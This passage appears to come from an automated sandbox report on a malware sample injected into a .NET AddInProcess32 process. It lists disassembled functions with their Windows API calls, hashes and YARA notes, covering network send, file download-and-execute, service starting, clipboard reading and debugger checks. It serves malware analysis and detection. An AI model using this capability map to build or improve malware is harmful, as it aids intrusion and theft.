                                          • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                        • FindClose.KERNEL32(00000000), ref: 004093C1
                                          • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                          • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                          • Part of subcall function 00404E26: CloseHandle.KERNELBASE(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                        • FindClose.KERNEL32(00000000), ref: 004095B9
                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                        • String ID:
                                        • API String ID: 1824512719-0
                                        • Opcode ID: b8615f818144c9de55a3c26363f6e9beaea89f970a6763e32edf7c6a920ea78d
                                        • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                        • Opcode Fuzzy Hash: b8615f818144c9de55a3c26363f6e9beaea89f970a6763e32edf7c6a920ea78d
                                        • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                        Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                        • String ID:
                                        • API String ID: 276877138-0
                                        • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                        • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                        • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                        • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                        Function 00451CD8 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                        • _wcschr.LIBVCRUNTIME ref: 00451E4A
                                        • _wcschr.LIBVCRUNTIME ref: 00451E58
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                        • String ID: sJD
                                        • API String ID: 4212172061-3536923933
                                        • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                        • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                        • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                        • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                        Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                        • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                        • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                        • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID: SETTINGS
                                        • API String ID: 3473537107-594951305
                                        • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                        • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                        • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                        • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                        Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040966A
                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstH_prologNext
                                        • String ID:
                                        • API String ID: 1157919129-0
                                        • Opcode ID: a63fc434628bc6551d32ba9ea463d8ae98ae71a2f16d0652880af83d60511800
                                        • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                        • Opcode Fuzzy Hash: a63fc434628bc6551d32ba9ea463d8ae98ae71a2f16d0652880af83d60511800
                                        • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                        Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00408811
                                        • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                        • String ID:
                                        • API String ID: 1771804793-0
                                        • Opcode ID: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
                                        • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                        • Opcode Fuzzy Hash: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
                                        • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                        Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DownloadExecuteFileShell
                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$open
                                        • API String ID: 2825088817-2881483049
                                        • Opcode ID: b624b8a8e6d1afd2671f4c94f0cce130be9b70bf72b71bf2efbf22e14ea94f47
                                        • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                        • Opcode Fuzzy Hash: b624b8a8e6d1afd2671f4c94f0cce130be9b70bf72b71bf2efbf22e14ea94f47
                                        • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                        Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                        • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileFind$FirstNextsend
                                        • String ID: XPG$XPG
                                        • API String ID: 4113138495-1962359302
                                        • Opcode ID: d3180e536943687776c1a305522e73affd7289e0c4d22ffe546a90957f10fbe8
                                        • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                        • Opcode Fuzzy Hash: d3180e536943687776c1a305522e73affd7289e0c4d22ffe546a90957f10fbe8
                                        • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                        Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                        Download Yara Rule
                                        APIs
                                        • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                          • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                          • Part of subcall function 0041376F: RegSetValueExA.KERNELBASE(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137A6
                                          • Part of subcall function 0041376F: RegCloseKey.KERNELBASE(?,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateInfoParametersSystemValue
                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                        • API String ID: 4127273184-3576401099
                                        • Opcode ID: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                                        • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                        • Opcode Fuzzy Hash: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                                        • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                        Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorInfoLastLocale$_free$_abort
                                        • String ID:
                                        • API String ID: 2829624132-0
                                        • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                        • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                        • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                        • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                        Function 0043BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                        • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                        • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                        • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                        Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00000000), ref: 00433849
                                        • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$AcquireRandomRelease
                                        • String ID:
                                        • API String ID: 1815803762-0
                                        • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                        • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                        • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                        • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                        Function 004432B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                                        • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                                        • ExitProcess.KERNEL32 ref: 004432EF
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                        • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                        • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                        • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                        Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenClipboard.USER32(00000000), ref: 0040B711
                                        • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                        • CloseClipboard.USER32 ref: 0040B725
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Clipboard$CloseDataOpen
                                        • String ID:
                                        • API String ID: 2058664381-0
                                        • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                        • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                        • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                        • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                        Function 0044E879 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: .
                                        • API String ID: 0-248832578
                                        • Opcode ID: 467a2b870f27eeaba5f3d85303d6c443c91537f9433fd9512f86f3d9895b4a39
                                        • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                                        • Opcode Fuzzy Hash: 467a2b870f27eeaba5f3d85303d6c443c91537f9433fd9512f86f3d9895b4a39
                                        • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                                        Function 00451F9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                        • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                        • String ID: lJD
                                        • API String ID: 1084509184-3316369744
                                        • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                        • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                        • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                        • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                        Function 00452036 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                        • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                        • String ID: lJD
                                        • API String ID: 1084509184-3316369744
                                        • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                        • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                        • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                        • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                        Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: GetLocaleInfoEx
                                        • API String ID: 2299586839-2904428671
                                        • Opcode ID: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                        • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                        • Opcode Fuzzy Hash: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                        • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                        Function 00412077 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$FreeProcess
                                        • String ID:
                                        • API String ID: 3859560861-0
                                        • Opcode ID: f8b7229bde56183a56125516245bdcff620dba8344b2748e8b36a977d3a4176b
                                        • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                                        • Opcode Fuzzy Hash: f8b7229bde56183a56125516245bdcff620dba8344b2748e8b36a977d3a4176b
                                        • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                                        Function 00434C52 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FeaturePresentProcessor
                                        • String ID:
                                        • API String ID: 2325560087-0
                                        • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                        • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                        • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                        • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                        Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
